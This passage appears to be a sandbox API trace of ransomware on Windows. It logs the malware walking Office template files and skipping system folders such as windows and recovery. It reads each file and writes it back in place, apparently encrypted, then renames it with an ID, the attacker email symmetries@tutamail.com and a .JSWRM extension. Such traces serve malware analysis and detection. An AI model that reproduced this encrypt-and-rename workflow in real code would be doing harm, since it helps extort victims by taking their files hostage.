dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0120.947] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236520 | out: hHeap=0x1e0000) returned 1 [0120.947] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0120.947] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0120.947] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xae49f22, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xae49f22, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xae70165, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2eb0, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="bwclassic.dotx", cAlternateFileName="BWCLAS~1.DOT")) returned 1 [0120.947] lstrcmpiW (lpString1="bwclassic.dotx", lpString2=".") returned 1 [0120.947] lstrcmpiW (lpString1="bwclassic.dotx", lpString2="..") returned 1 [0120.948] lstrcmpiW (lpString1="bwclassic.dotx", lpString2="...") returned 1 [0120.948] lstrcmpiW (lpString1="bwclassic.dotx", lpString2="windows") returned -1 [0120.948] lstrcmpiW (lpString1="bwclassic.dotx", lpString2="recovery") returned -1 [0120.948] lstrcmpiW (lpString1="bwclassic.dotx", lpString2="perflogs") returned -1 [0120.948] lstrcmpiW (lpString1="bwclassic.dotx", lpString2="documents and settings") returned -1 [0120.948] lstrcmpiW (lpString1="bwclassic.dotx", lpString2="$RECYCLE.BIN") returned 1 [0120.948] lstrcmpiW (lpString1="bwclassic.dotx", lpString2="system volume information") returned -1 [0120.948] lstrcmpiW (lpString1="bwclassic.dotx", lpString2="msocache") returned -1 [0120.948] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0120.948] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bwclassic.dotx", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0120.948] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bwclassic.dotx", cchWideChar=14, lpMultiByteStr=0x345e870, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bwclassic.dotx", lpUsedDefaultChar=0x0) returned 14 [0120.948] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0120.948] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f98 [0120.948] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bwclassic.dotx", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0120.948] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bwclassic.dotx", cchWideChar=14, lpMultiByteStr=0x345e840, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bwclassic.dotx", lpUsedDefaultChar=0x0) returned 14 [0120.948] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f98 | out: hHeap=0x1e0000) returned 1 [0120.948] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0120.948] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0120.948] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0120.948] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0120.948] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0120.948] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\QuickStyles\\bwclassic.dotx" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\quickstyles\\bwclassic.dotx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0120.949] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=11952) returned 1 [0120.949] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.949] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2eb0) returned 0x24e1d8 [0120.949] ReadFile (in: hFile=0x314, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x2eb0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e534*=0x2eb0, lpOverlapped=0x0) returned 1 [0120.979] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.979] WriteFile (in: hFile=0x314, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x2eb0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e530*=0x2eb0, lpOverlapped=0x0) returned 1 [0120.980] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0120.980] CloseHandle (hObject=0x314) returned 1 [0120.980] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0120.980] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0120.980] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0120.980] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0120.980] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0120.980] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0120.980] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0120.980] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0120.980] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0120.980] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0120.980] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0120.980] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dff8 [0120.980] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0120.980] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0120.980] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\QuickStyles\\bwclassic.dotx" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\quickstyles\\bwclassic.dotx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\QuickStyles\\bwclassic.dotx.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\quickstyles\\bwclassic.dotx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0120.982] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dff8 | out: hHeap=0x1e0000) returned 1 [0120.982] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0120.982] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0120.982] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xae49f22, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xae49f22, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xae70165, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3436, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="bwnumbered.dotx", cAlternateFileName="BWNUMB~1.DOT")) returned 1 [0120.982] lstrcmpiW (lpString1="bwnumbered.dotx", lpString2=".") returned 1 [0120.982] lstrcmpiW (lpString1="bwnumbered.dotx", lpString2="..") returned 1 [0120.982] lstrcmpiW (lpString1="bwnumbered.dotx", lpString2="...") returned 1 [0120.982] lstrcmpiW (lpString1="bwnumbered.dotx", lpString2="windows") returned -1 [0120.982] lstrcmpiW (lpString1="bwnumbered.dotx", lpString2="recovery") returned -1 [0120.982] lstrcmpiW (lpString1="bwnumbered.dotx", lpString2="perflogs") returned -1 [0120.982] lstrcmpiW (lpString1="bwnumbered.dotx", lpString2="documents and settings") returned -1 [0120.982] lstrcmpiW (lpString1="bwnumbered.dotx", lpString2="$RECYCLE.BIN") returned 1 [0120.982] lstrcmpiW (lpString1="bwnumbered.dotx", lpString2="system volume information") returned -1 [0120.982] lstrcmpiW (lpString1="bwnumbered.dotx", lpString2="msocache") returned -1 [0120.982] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0120.982] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bwnumbered.dotx", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0120.982] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bwnumbered.dotx", cchWideChar=15, lpMultiByteStr=0x345e870, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bwnumbered.dotx", lpUsedDefaultChar=0x0) returned 15 [0120.982] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0120.982] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411f0 [0120.982] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bwnumbered.dotx", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0120.982] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bwnumbered.dotx", cchWideChar=15, lpMultiByteStr=0x345e840, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bwnumbered.dotx", lpUsedDefaultChar=0x0) returned 15 [0120.982] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411f0 | out: hHeap=0x1e0000) returned 1 [0120.982] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235f60 [0120.982] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0120.982] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0120.982] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0120.982] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0120.982] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\QuickStyles\\bwnumbered.dotx" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\quickstyles\\bwnumbered.dotx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0120.983] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=13366) returned 1 [0120.983] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.983] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3430) returned 0x24e1d8 [0120.983] ReadFile (in: hFile=0x314, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x3430, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e534*=0x3430, lpOverlapped=0x0) returned 1 [0120.986] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.986] WriteFile (in: hFile=0x314, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x3430, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e530*=0x3430, lpOverlapped=0x0) returned 1 [0120.986] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0120.986] CloseHandle (hObject=0x314) returned 1 [0120.986] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235d38 [0120.986] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0120.986] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0120.987] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0120.987] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0120.987] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0120.987] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0120.987] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0120.987] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0120.987] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0120.987] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236018 [0120.987] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e458 [0120.987] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236018 | out: hHeap=0x1e0000) returned 1 [0120.987] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0120.987] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\QuickStyles\\bwnumbered.dotx" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\quickstyles\\bwnumbered.dotx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\QuickStyles\\bwnumbered.dotx.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\quickstyles\\bwnumbered.dotx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0120.988] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e458 | out: hHeap=0x1e0000) returned 1 [0120.988] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235d38 | out: hHeap=0x1e0000) returned 1 [0120.988] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0120.988] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xae49f22, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xae49f22, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xae49f22, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2f7b, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="casual.dotx", cAlternateFileName="CASUAL~1.DOT")) returned 1 [0120.988] lstrcmpiW (lpString1="casual.dotx", lpString2=".") returned 1 [0120.988] lstrcmpiW (lpString1="casual.dotx", lpString2="..") returned 1 [0120.988] lstrcmpiW (lpString1="casual.dotx", lpString2="...") returned 1 [0120.988] lstrcmpiW (lpString1="casual.dotx", lpString2="windows") returned -1 [0120.988] lstrcmpiW (lpString1="casual.dotx", lpString2="recovery") returned -1 [0120.988] lstrcmpiW (lpString1="casual.dotx", lpString2="perflogs") returned -1 [0120.988] lstrcmpiW (lpString1="casual.dotx", lpString2="documents and settings") returned -1 [0120.988] lstrcmpiW (lpString1="casual.dotx", lpString2="$RECYCLE.BIN") returned 1 [0120.988] lstrcmpiW (lpString1="casual.dotx", lpString2="system volume information") returned -1 [0120.988] lstrcmpiW (lpString1="casual.dotx", lpString2="msocache") returned -1 [0120.988] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0120.988] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="casual.dotx", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0120.988] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="casual.dotx", cchWideChar=11, lpMultiByteStr=0x345e870, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="casual.dotx", lpUsedDefaultChar=0x0) returned 11 [0120.988] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0120.988] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0120.988] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="casual.dotx", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0120.988] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="casual.dotx", cchWideChar=11, lpMultiByteStr=0x345e840, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="casual.dotx", lpUsedDefaultChar=0x0) returned 11 [0120.988] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0120.988] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0120.988] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235f60 | out: hHeap=0x1e0000) returned 1 [0120.988] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0120.988] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0120.988] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0120.989] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\QuickStyles\\casual.dotx" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\quickstyles\\casual.dotx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0120.989] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=12155) returned 1 [0120.989] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.989] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2f70) returned 0x24e1d8 [0120.989] ReadFile (in: hFile=0x314, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x2f70, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e534*=0x2f70, lpOverlapped=0x0) returned 1 [0120.991] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.991] WriteFile (in: hFile=0x314, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x2f70, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e530*=0x2f70, lpOverlapped=0x0) returned 1 [0120.992] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0120.992] CloseHandle (hObject=0x314) returned 1 [0120.992] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0120.992] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0120.992] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0120.992] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0120.992] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0120.992] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0120.992] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0120.992] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0120.992] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0120.992] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0120.992] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235ea8 [0120.992] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e688 [0120.992] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235ea8 | out: hHeap=0x1e0000) returned 1 [0120.992] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0120.992] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\QuickStyles\\casual.dotx" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\quickstyles\\casual.dotx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\QuickStyles\\casual.dotx.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\quickstyles\\casual.dotx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0120.993] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e688 | out: hHeap=0x1e0000) returned 1 [0120.993] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0120.993] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0120.993] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xae49f22, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xae49f22, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xae49f22, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2f84, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="centered.dotx", cAlternateFileName="CENTER~1.DOT")) returned 1 [0120.993] lstrcmpiW (lpString1="centered.dotx", lpString2=".") returned 1 [0120.993] lstrcmpiW (lpString1="centered.dotx", lpString2="..") returned 1 [0120.993] lstrcmpiW (lpString1="centered.dotx", lpString2="...") returned 1 [0120.993] lstrcmpiW (lpString1="centered.dotx", lpString2="windows") returned -1 [0120.993] lstrcmpiW (lpString1="centered.dotx", lpString2="recovery") returned -1 [0120.993] lstrcmpiW (lpString1="centered.dotx", lpString2="perflogs") returned -1 [0120.993] lstrcmpiW (lpString1="centered.dotx", lpString2="documents and settings") returned -1 [0120.993] lstrcmpiW (lpString1="centered.dotx", lpString2="$RECYCLE.BIN") returned 1 [0120.993] lstrcmpiW (lpString1="centered.dotx", lpString2="system volume information") returned -1 [0120.993] lstrcmpiW (lpString1="centered.dotx", lpString2="msocache") returned -1 [0120.993] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0120.993] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="centered.dotx", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 